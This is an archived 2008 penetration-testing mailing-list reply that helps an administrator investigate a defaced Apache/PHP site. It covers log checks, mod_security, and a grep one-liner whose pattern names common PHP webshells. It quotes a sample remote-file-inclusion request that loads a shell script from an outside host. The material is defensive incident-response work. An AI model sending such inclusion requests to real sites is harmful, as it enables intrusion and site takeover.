Penetration Testing mailing list archives

Re: Hacked by aLpTurkTegin, help patching this hole


From: yummy <animalstastegood () gmail com>
Date: Sun, 25 May 2008 20:03:49 -0400

Which user owned the hacked files, the user account or the webserver?

In my experience, if it was the user account, then there was a weak
password and it was brute-forced. Check the FTP logs for file uploads
for that user account.

If it was owned by the webserver, then there is probably
exploitable PHP code on the site, and usually it is due to a remote
file inclusion.
Check the Apache domlogs; you might get lucky and find something.
RFI entries often look something like:

 69.89.25.169 - - [25/Jan/2008:10:23:23 -0500] "GET //includes/img/settings.inc.php?include_path=http://example.remoteserver.com/components/com_magazine/layouts/cmd.txt?? HTTP/1.1" 200 - "-"

In the above example, the PHP file "settings.inc.php" is vulnerable
and allows the code in a PHP file on a remote server
(example.remoteserver.com) to be included (cmd.txt). Many times the
remote file will be a phpshell.

Of course this is just an example, you'd have to find what is being
exploited by what the others have suggested...

Sorry, this is kinda long-winded and pretty much what everyone else
said, but I have to deal with annoying defacement of sites every day.
People that do that really bug me, plus I'm bored right now. :)

One HUGE help would be to make sure you have mod_security installed
and a decent modsec ruleset. That will prevent a lot of naughtiness
from happening.

I also like to check for perl procs running as the webserver id,
world-writable directories, and phpshells located in user accounts.

find /home/useraccountname/public_html/ -type d -perm -o+w

will locate insecure directories.

The following oneliner will find many common phpshells:

find /home/*/public_html -type f -print0 | xargs -0 grep -El '(\/tmp\/cmdtemp|SnIpEr_SA|c99shell|r57shell|milw0rm)'

It may take quite a while to complete depending on how many files
there are on the server.

My money is on an outdated PHP CMS/forum like phpBB, etc., like
everyone else mentioned...

On Tue, May 20, 2008 at 8:46 AM, Mifa <mifa () stangercorp com> wrote:

Our website was defaced by aLpTurkTegin. We are running Apache, PHP, etc. Does anyone know how this hacker is
getting in and what I can do to prevent this?

Our main web directory had all but one file deleted, and hackedIndex.php, a.asp (a 0-byte file) and trustscn_put_test2
were placed into the main directory. The fact that the webserver served hackedindex.php makes me think it's an Apache
web server flaw.

Any comments, suggestions?
Thanks, -D

------------------------------------------------------------------------
This list is sponsored by: Cenzic

Top 5 Common Mistakes
in Securing Web Applications
Find out now! Get Webinar Recording and PPT Slides

www.cenzic.com/landing/securityfocus/hackinar
------------------------------------------------------------------------